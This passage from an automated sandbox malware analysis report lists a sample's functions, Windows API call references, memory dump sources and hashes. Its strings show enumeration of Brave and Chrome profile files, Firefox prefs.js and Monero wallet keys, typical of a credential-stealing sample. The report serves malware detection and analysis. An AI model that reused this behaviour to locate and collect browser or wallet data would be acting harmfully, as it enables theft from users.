                            • StrCmpCA.SHLWAPI(?,003613FC), ref: 0034BF63
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0034C7BF
                            • FindClose.KERNEL32(000000FF), ref: 0034C7D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-726946144
                            • Opcode ID: 101404be076ef840dfa694f0602f553f27c733748438bd4f2e5143f264f22181
                            • Instruction ID: b6c4b0df0da5c36b486c2e7d07bc5727c2b96897120ed72455de16721797ead4
                            • Opcode Fuzzy Hash: 101404be076ef840dfa694f0602f553f27c733748438bd4f2e5143f264f22181
                            • Instruction Fuzzy Hash: 844275719101089BDB16FBB0DC56EED777CAB54301F404658FD06AA0A1EF34AB4DEBA2
                            Function 00354910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 0035492C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00354943
                            • StrCmpCA.SHLWAPI(?,00360FDC), ref: 00354971
                            • StrCmpCA.SHLWAPI(?,00360FE0), ref: 00354987
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00354B7D
                            • FindClose.KERNEL32(000000FF), ref: 00354B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: 2f0e6314dcdd2be600bc34a2006271de492d87870ad88f2d2cb1dcff31064192
                            • Instruction ID: d0a44581778ecfcd9a958c788cdf9f63c21507853d497a6a3bc6eabc747019a2
                            • Opcode Fuzzy Hash: 2f0e6314dcdd2be600bc34a2006271de492d87870ad88f2d2cb1dcff31064192
                            • Instruction Fuzzy Hash: E1619A71900208ABDB25EFA0DC45FEA737CFB58301F048589F909A6054EB74EB89DFA1
                            Function 00354570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00354580
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00354587
                            • wsprintfA.USER32 ref: 003545A6
                            • FindFirstFileA.KERNEL32(?,?), ref: 003545BD
                            • StrCmpCA.SHLWAPI(?,00360FC4), ref: 003545EB
                            • StrCmpCA.SHLWAPI(?,00360FC8), ref: 00354601
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0035468B
                            • FindClose.KERNEL32(000000FF), ref: 003546A0
                            • lstrcat.KERNEL32(?,00FBE8E8), ref: 003546C5
                            • lstrcat.KERNEL32(?,00FBDAA0), ref: 003546D8
                            • lstrlen.KERNEL32(?), ref: 003546E5
                            • lstrlen.KERNEL32(?), ref: 003546F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 47a7124414468c94ed26b61fc476c99a208d968c67c987bde60bf5d076f26150
                            • Instruction ID: e1a554fd4c31482bd5947c2493ddb80aed904ee11e0eeaaf895a44030a077252
                            • Opcode Fuzzy Hash: 47a7124414468c94ed26b61fc476c99a208d968c67c987bde60bf5d076f26150
                            • Instruction Fuzzy Hash: EC5168B19002189BD725EB70DC89FEE737CAB58301F404589FA09A6154EB749B8DDFA2
                            Function 00353EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 00353EC3
                            • FindFirstFileA.KERNEL32(?,?), ref: 00353EDA
                            • StrCmpCA.SHLWAPI(?,00360FAC), ref: 00353F08
                            • StrCmpCA.SHLWAPI(?,00360FB0), ref: 00353F1E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0035406C
                            • FindClose.KERNEL32(000000FF), ref: 00354081
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: 614ad791ec720cad6be4f3a2b8c47d17c7e862e8d491fd39f8945b2e995a0475
                            • Instruction ID: 4521daf7041de2627f8036a2b8e21248d555c577eb67188a48c429b955a89d72
                            • Opcode Fuzzy Hash: 614ad791ec720cad6be4f3a2b8c47d17c7e862e8d491fd39f8945b2e995a0475
                            • Instruction Fuzzy Hash: 66517CB2900218ABDB25FBB0DC45EEA737CBB54301F004589FA59A6050EB75EB8DDF61
                            Function 0034ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 0034ED3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 0034ED55
                            • StrCmpCA.SHLWAPI(?,00361538), ref: 0034EDAB
                            • StrCmpCA.SHLWAPI(?,0036153C), ref: 0034EDC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0034F2AE
                            • FindClose.KERNEL32(000000FF), ref: 0034F2C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: 9531cb50d2286861ebf6f3e42c54707abefa2724ce02b5761f8a7f9d018efc89
                            • Instruction ID: c38bd533848aaf78d6c1c1619416671e679d459c4c1cb11ef6e75b3d3a1d8bdc
                            • Opcode Fuzzy Hash: 9531cb50d2286861ebf6f3e42c54707abefa2724ce02b5761f8a7f9d018efc89
                            • Instruction Fuzzy Hash: 6EE146719116185ADB56FB60CC52EEE777CBF54301F404299B80A6A062EF306F8EEF51
                            Function 0034F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003615B8,00360D96), ref: 0034F71E
                            • StrCmpCA.SHLWAPI(?,003615BC), ref: 0034F76F
                            • StrCmpCA.SHLWAPI(?,003615C0), ref: 0034F785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0034FAB1
                            • FindClose.KERNEL32(000000FF), ref: 0034FAC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: 6508b9f13698a1f229e580412b90d4bafb196f8da2a5aa845d39951c47b2920d
                            • Instruction ID: ca260112845ce9ec7e0f4d34a4318cc71196c122a2b480de675a6e757445bbb1
                            • Opcode Fuzzy Hash: 6508b9f13698a1f229e580412b90d4bafb196f8da2a5aa845d39951c47b2920d
                            • Instruction Fuzzy Hash: 4FB153719006189BDB25EF60DC56EEE7778AF54301F4082A8EC0A9E151EF306B4DEF92
                            Function 003416D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0036510C,?,?,?,003651B4,?,?,00000000,?,00000000), ref: 00341923
                            • StrCmpCA.SHLWAPI(?,0036525C), ref: 00341973
                            • StrCmpCA.SHLWAPI(?,00365304), ref: 00341989
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00341D40
                            • DeleteFileA.KERNEL32(00000000), ref: 00341DCA
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00341E20
                            • FindClose.KERNEL32(000000FF), ref: 00341E32
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: 765ef3baf01c4917d3b6b942bae4bd92b90fafd9c77d603b015d8fe3ef8d01e4
                            • Instruction ID: 8fa5030dccd594055603ca7c1b4a8a0485c1a83898c809e177195f2414ae0852
                            • Opcode Fuzzy Hash: 765ef3baf01c4917d3b6b942bae4bd92b90fafd9c77d603b015d8fe3ef8d01e4
                            • Instruction Fuzzy Hash: 0412E2719105189BDB16FB60CC96EEE7778BF54301F404299B9066A0A1EF306F8DEFA1
                            Function 0034DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00360C2E), ref: 0034DE5E
                            • StrCmpCA.SHLWAPI(?,003614C8), ref: 0034DEAE
                            • StrCmpCA.SHLWAPI(?,003614CC), ref: 0034DEC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0034E3E0
                            • FindClose.KERNEL32(000000FF), ref: 0034E3F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: 57daf548c47b5ab8a6c9ed7c83123f7f39764f887d7d95033d21a1890e88c74f
                            • Instruction ID: 8ba360ce4d8803fa2e5a34e38c850d2a1c9a275f866dc20690eb78bd4eb23025
                            • Opcode Fuzzy Hash: 57daf548c47b5ab8a6c9ed7c83123f7f39764f887d7d95033d21a1890e88c74f
                            • Instruction Fuzzy Hash: 67F19F718145189ADB17FB60CC95EEE7778BF14301F8042D9A80A6A0A1EF306F8EEF51
                            Function 0034DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003614B0,00360C2A), ref: 0034DAEB
                            • StrCmpCA.SHLWAPI(?,003614B4), ref: 0034DB33
                            • StrCmpCA.SHLWAPI(?,003614B8), ref: 0034DB49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0034DDCC
                            • FindClose.KERNEL32(000000FF), ref: 0034DDDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: d869d142c96f7f1de8a82895a94f18632f553e4a7e4941bd421f32fe4a5430b2
                            • Instruction ID: 97bf038507ed816fb7f7d0ac91f2505cfde2451640cfd5611cc48b797141a90b
                            • Opcode Fuzzy Hash: d869d142c96f7f1de8a82895a94f18632f553e4a7e4941bd421f32fe4a5430b2
                            • Instruction Fuzzy Hash: C491747290060497CB16FBB0EC56DED777CAF98301F408659FD0A9E151EE34AB0D9B92
                            Function 00704625 Relevance: 11.6, Strings: 8, Instructions: 1592COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
